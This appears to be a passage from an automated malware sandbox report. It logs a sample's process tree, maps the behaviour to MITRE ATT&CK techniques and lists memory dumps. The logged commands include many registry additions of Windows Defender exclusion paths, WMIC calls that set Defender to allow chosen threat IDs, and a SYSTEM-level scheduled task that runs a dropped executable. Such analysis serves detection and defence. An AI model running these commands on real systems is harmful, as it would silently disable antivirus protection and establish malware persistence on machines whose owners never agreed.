    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4540
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1376
- C:\Windows\SysWOW64\cmd.exe
  cmd /C copy nul "C:\Windows\Temp\nyFjvKGtfVGLAKAU\CsmpMeZI\UMqQYyyOllJmLzNS.wsf"
  2⤵
  PID:1908
- C:\Windows\SysWOW64\wscript.exe
  wscript "C:\Windows\Temp\nyFjvKGtfVGLAKAU\CsmpMeZI\UMqQYyyOllJmLzNS.wsf"
  2⤵
  PID:3180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\QPFeEjmgnBUOfRVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4956
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 00:01:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\TReCoQk.exe\" za /site_id 668658 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4492
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "xsEpqqHAgqAwsAroz"
  2⤵
  PID:3644

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
1⤵
PID:276
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
  2⤵
  PID:3312
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
    3⤵
    PID:2824

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1112
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4192

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4544
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding CF5EA486F1B2CE9F9124C7D082AA61A1 C
  2⤵
  PID:4740

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource core
1⤵
PID:3704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
1⤵
PID:3556
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
  2⤵
  PID:2288

C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\TReCoQk.exe
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\TReCoQk.exe za /site_id 668658 /S
1⤵
PID:1936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:3684
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4036
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:188

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/240-205-0x0000000002040000-0x0000000002C8A000-memory.dmp

Filesize
12.3MB

Download
memory/240-198-0x0000000002040000-0x0000000002C8A000-memory.dmp

Filesize
12.3MB

Download
memory/240-189-0x0000000002040000-0x0000000002C8A000-memory.dmp

Filesize
12.3MB

Download
memory/704-195-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/704-194-0x0000000000670000-0x00000000006B8000-memory.dmp

Filesize
288KB

Download
memory/988-403-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/1008-407-0x0000000000250000-0x000000000027F000-memory.dmp

Filesize
188KB

Download
memory/1108-400-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/1172-201-0x000000001B0F0000-0x000000001B0F2000-memory.dmp

Filesize
8KB

Download
memory/1172-182-0x0000000000330000-0x0000000000331000-memory.dmp

Filesize
4KB

Download
memory/1184-395-0x0000000004C50000-0x0000000004C51000-memory.dmp

Filesize
4KB

Download
memory/1184-358-0x0000000000230000-0x000000000027D000-memory.dmp

Filesize
308KB

Download
memory/1260-228-0x0000000000660000-0x000000000067D000-memory.dmp

Filesize
116KB

Download
memory/1260-225-0x0000000000780000-0x00000000007A3000-memory.dmp

Filesize
140KB

Download
memory/1260-207-0x00000000055E0000-0x00000000055E1000-memory.dmp

Filesize
4KB

Download
memory/1260-190-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1276-206-0x00000000038F0000-0x0000000003905000-memory.dmp

Filesize
84KB

Download
memory/1468-204-0x0000000003F40000-0x0000000004080000-memory.dmp

Filesize
1.2MB

Download
memory/1516-54-0x0000000075711000-0x0000000075713000-memory.dmp

Filesize
8KB

Download
memory/1632-381-0x0000000004F30000-0x0000000004F31000-memory.dmp

Filesize
4KB

Download
memory/1672-380-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

Filesize
4KB

Download
memory/1764-192-0x00000000001C0000-0x000000000020D000-memory.dmp

Filesize
308KB

Download
memory/1764-193-0x0000000000400000-0x000000000044D000-memory.dmp

Filesize
308KB

Download
memory/1776-90-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1776-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1776-92-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1776-89-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1776-83-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1776-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1776-88-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1776-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1776-87-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1776-86-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1780-397-0x00000000051E0000-0x00000000051E1000-memory.dmp

Filesize
4KB

Download
memory/1844-362-0x00000000009E4000-0x00000000009E6000-memory.dmp

Filesize
8KB

Download
memory/1844-360-0x00000000009E2000-0x00000000009E3000-memory.dmp

Filesize
4KB

Download
memory/2036-179-0x0000000000B80000-0x0000000000B81000-memory.dmp

Filesize
4KB

Download
memory/2036-202-0x000000001B000000-0x000000001B002000-memory.dmp

Filesize
8KB

Download
memory/2036-196-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/2108-180-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2136-200-0x0000000000250000-0x000000000025B000-memory.dmp

Filesize
44KB

Download
memory/2136-197-0x0000000000730000-0x0000000000732000-memory.dmp

Filesize
8KB

Download
memory/2136-181-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/2320-188-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/2328-379-0x0000000000EA0000-0x0000000001417000-memory.dmp

Filesize
5.5MB

Download
memory/2344-378-0x000000001B000000-0x000000001B002000-memory.dmp

Filesize
8KB

Download
memory/2408-382-0x0000000001D60000-0x0000000001D61000-memory.dmp

Filesize
4KB

Download
memory/2456-385-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2460-405-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/2528-365-0x0000000004FB0000-0x0000000004FB1000-memory.dmp

Filesize
4KB

Download
memory/2564-203-0x0000000001FB0000-0x0000000001FB2000-memory.dmp

Filesize
8KB

Download
memory/2564-248-0x000000001C830000-0x000000001CB2F000-memory.dmp

Filesize
3.0MB

Download
memory/2728-386-0x000000001AF70000-0x000000001AF72000-memory.dmp

Filesize
8KB

Download
memory/2764-371-0x0000000000BE0000-0x0000000000BE2000-memory.dmp

Filesize
8KB

Download
memory/2820-218-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

Filesize
4KB

Download
memory/2820-213-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download
memory/2820-217-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/2828-376-0x0000000000593000-0x0000000000594000-memory.dmp

Filesize
4KB

Download
memory/2828-374-0x0000000000591000-0x0000000000592000-memory.dmp

Filesize
4KB

Download
memory/2828-373-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2828-375-0x0000000000592000-0x0000000000593000-memory.dmp

Filesize
4KB

Download
memory/2828-377-0x0000000000594000-0x0000000000596000-memory.dmp

Filesize
8KB

Download
memory/2828-372-0x0000000000220000-0x0000000000250000-memory.dmp

Filesize
192KB

Download
memory/2848-214-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/2856-369-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2892-368-0x0000000000400000-0x0000000000D39000-memory.dmp

Filesize
9.2MB

Download
memory/2892-367-0x0000000002E70000-0x000000000378E000-memory.dmp

Filesize
9.1MB

Download
memory/2948-257-0x000000001BF50000-0x000000001BF52000-memory.dmp

Filesize
8KB

Download
memory/2948-260-0x0000000000560000-0x000000000056A000-memory.dmp

Filesize
40KB

Download
memory/2948-220-0x000000013F430000-0x000000013F431000-memory.dmp

Filesize
4KB

Download
memory/2996-229-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2996-235-0x000000001AE90000-0x000000001AE92000-memory.dmp

Filesize
8KB

Download
memory/2996-223-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/3040-234-0x000000001B2B0000-0x000000001B2B2000-memory.dmp

Filesize
8KB

Download
memory/3040-230-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/3052-370-0x0000000002060000-0x0000000002062000-memory.dmp

Filesize
8KB

Download
memory/3168-387-0x0000000000400000-0x0000000000682000-memory.dmp

Filesize
2.5MB

Download
memory/3168-388-0x0000000000240000-0x0000000000243000-memory.dmp

Filesize
12KB

Download
memory/3244-390-0x00000000000F0000-0x0000000000131000-memory.dmp

Filesize
260KB

Download
memory/3244-393-0x00000000000F0000-0x0000000000131000-memory.dmp

Filesize
260KB

Download
memory/3252-366-0x0000000002BB0000-0x0000000002BB1000-memory.dmp

Filesize
4KB

Download
memory/3440-404-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/3576-406-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/3744-383-0x0000000002230000-0x0000000002231000-memory.dmp

Filesize
4KB

Download
memory/3796-398-0x0000000000D10000-0x0000000000D11000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads